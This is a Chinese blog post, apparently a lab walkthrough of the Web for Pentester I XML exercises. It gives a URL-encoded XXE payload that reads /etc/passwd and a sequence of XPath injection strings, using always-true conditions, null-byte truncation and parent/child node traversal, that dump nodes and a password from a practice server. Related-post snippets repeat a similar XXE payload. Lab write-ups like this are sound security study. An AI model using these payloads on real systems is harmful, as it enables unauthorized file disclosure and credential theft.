Web_for_Pentester_I之XML attacks

最新推荐文章于 2024-05-17 14:32:46 发布
最新推荐文章于 2024-05-17 14:32:46 发布
阅读量278 收藏
点赞数
分类专栏: Web_for_Pentester_I 文章标签: 前端 xml php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/swl412/article/details/128924831
版权

Web_for_Pentester是国外安全研究者开发的一款渗透测试平台,由PentesterLab出品。官方给自己的定义是一个简单又十分有效地学习渗透测试的演练平台。
XML attacks通常都是通过使用XPATH来恢复XML文件的解析设置来进行的。举个例子,如根据组织的名称来了解后台是如何对用户进行的身份验证。

【实验步骤】
一、Example1
1.1 XML attacks Example1的源代码example1.php如下。如图1所示
在这里插入图片描述

图 1
1.2 直接构造实体。在火狐浏览器地址栏输入http://vulnerable/xml/example1.php?
xml=
]>&xipu;,得到Warning信息。如图2所示
在这里插入图片描述

图 2
1.3 使用Burp Suite对]>&xipu;进行URL编码,得到其URL编码后的结果,复制得到的结果。如图3所示
在这里插入图片描述

图 3
1.4 在火狐浏览器地址栏输入URL地址http://vulnerable/xml/example1.php?xml=%3c%21%44%4f%43%54%59%50%45%20%73%69%6d%70%6c%65%77%61%72%65%20%5b%3c%21%45%4e%54%49%54%59%20%78%69%70%75%20%53%59%53%54%45%4d%20%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%3e%5d%3e%3c%63%3e%26%78%69%70%75%3b%3c%2f%63%3e%0a,成功获得passwd文件内容。如图4所示
在这里插入图片描述

图 4
二、Example2
2.1 由XML attacks Example2的源代码example2.php可知,在这个例子中,代码利用了用户输入,插入了一个XPath表达式。插入的XPath是一个查询语句,查询XML文档中的节点。把XML文档想象成一个数据库,XPath则是一个查询语句,如果你能操纵这个查询,你就能找到那些你本来无法找到的元素。如图5所示
在这里插入图片描述

图 5
2.2 和SQL注入相似,XPath允许使用逻辑判断,下面我们可以进行一些尝试。Example2默认name的值为hacker。如图6所示
在这里插入图片描述

图 6
2.3 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ and ‘1’='1,得到相同的结果。如图7所示
在这里插入图片描述

图 7
2.4 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ and ‘1’='0,得不到任何结果。如图8所示
在这里插入图片描述

图 8
2.5 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or ‘1’='0,得到相同的结果。如图9所示
在这里插入图片描述

图 9
2.6 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or ‘1’='1,得到所有的结果。如图10所示
在这里插入图片描述

图 10
2.7 基于这些测试和之前对于XPath的了解,我们大致可以得到该XPath语句的构造为:[PARENT NODES]/name[.=’ [INPUT] ‘]/[CHILD NODES]。要想注释掉余下的XPath语句,你可以使用空字符(你需要将其编码成%00)。正如我们在XPath表达式中所看到,我们还需要一个]来完成语法。在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’]%00,得到相同的结果。如图11所示
在这里插入图片描述

图 11
2.8 在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or 1=1]%00,得到所有结果。如图12所示
在这里插入图片描述

图 12
2.9 查找当前节点的子节点,在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’] /child::node()%00,结果如下。如图13所示
在这里插入图片描述

图 13
2.10 若要再次回到节点层来获取更多信息。在XPath里,这可以通过使用parent::作为语句的部分来完成。查询当前节点的父节点,在浏览器地址栏输入http://vulnerable/xml/example2.php?name=hacker’ or 1=1]/parent::/
child::node()%00,可以列出所有节点。如图14所示
在这里插入图片描述

图 14
2.11 其中一个节点的值看起来就像密码。我们可以通过使用语句hacker']/parent::*/password%00,结果如下。如图15所示
在这里插入图片描述

图 15

贝隆驿站
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
你所不知道的XML安全——XML攻击方法小结
01-09
转载: 你所不知道的XML安全——XML攻击方法小结. XML可扩展标记语言,被设计用来传输和存储数据,其形式多样。某些在XML中被设计出来的特性,比如 XML schemas(遵循XML Schemas 规范)和documents type definitions(DTDs)都是安全问题来源。纵然被公开的讨论了上十年,还是有一大批一大批的软件死在针对XML的攻击上。
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1485
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
XML Attack
飘飘何所似?天地一沙鸥。
08-11 267
这篇文章主要介绍如何利用XML的DOCTYPE属性进行恶意攻击和如何防范这类的攻击。   我们先看2个XML应用片段 场景1:在XML使用DTD family.xml   <?xml version="1.0" standalone="no"?> <!DOCTYPE family SYSTEM "family.dtd"> <family lastnam...
Injection Attacks-XML注入
weixin_34092455的博客
03-11 230
注入攻击 XML注入 虽然JSON的出现实现了服务器与客户端之间的“轻量级”数据交流,但是,作为另一种流行的可行方案,许多web服务API同时还是继续支持XML。另外,除了web服务之外,XML也是许多使用XML schemas 实行数据交换的协议的基础,例如RSS,Atom,SOAP,以及RDF等等,举不胜举。 XML无处不在:它存在于...
Web for pentester_writeup之XML attacks
ditanji3425的博客
09-25 319
Web for pentester_writeup之XML attacksXML attacksXML攻击) Example 1 - XML外部实体注入(XXE) Payload http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd...
web_for_pentester.pdf
04-02
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
web_for_pentester.zip
11-26
web_for_pentester
Black Hat PytHon Python Programming for Hackers and Pentesters
01-12
Throughout this book you will learn that this is how I code, but I also feel as though it is part of what makes me a strong pentester. I hope that this philosophy and style helps you as well. As you ...
【渗透测试学习平台】 web for pentester -8.XML
07-22 435
example1: http://192.168.91.139/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21ENTITY%20name%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fp...
渗透测试学习平台-web for pentester
专注于性能调优、安全、自动化
04-24 4007
web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。 如: XSS跨站脚本攻击 SQL注入 目录遍历 命令注入 代码注入 XML攻击 LDAP攻击 文件上传 以及一些指纹识别的技术 下载 web_for_pentester.
【渗透测试学习平台】 web for pentester -4.目录遍历
07-21 474
Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 http://192.168.106.154/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passw...
搭建学习环境(十一)——Web_For_Pentester通关记录
baynk的博客
04-09 2398
0x00 Pentesterlab 又发现了一靶场,大多数都是相同的,但是也有之前一直没有学习的ldap注入,而且安装时用的不是开发者提供的整机靶场,自己把源码拿出来了,搭建在了自己的服务器上,然后还原的ldap环境及修改部分代码成功还原实验场景,对ldap也有了更深的理解,虽然花了不少时间,linux搞openladp感觉好麻烦,特别是导数据,不过还是很值得的,学了不少东西。 此靶场准备用两篇博...
Web For Pentester 阅读笔记(1)
kezhen的专栏
06-06 2907
The Web Web appl ications are probably the most common services exposed by companies and insti tutions on the internet, furthermore, most old appl ications have now a "web version" to be avai lable
源代码测试!!!!!!源代码测试!!!!!!
u012561745的专栏
06-10 1199
源代码测试可以找本人,JAVA,C/C++,C#。
WEB转Flutter基础学习笔记(内含vue和flutter对比)
最新发布
小易不止于搬砖的博客
05-17 664
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1102
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
s_sos0的博客
05-14 481
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
Web For Pentester 第八关分析
06-07
<title>Web for Pentester <h1 align="center">Welcome to Web for Pentester <img src="8.jpg" alt="web for pentester"> ``` 从代码中可以看出,这是一个简单的表单,让用户输入 flag 并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值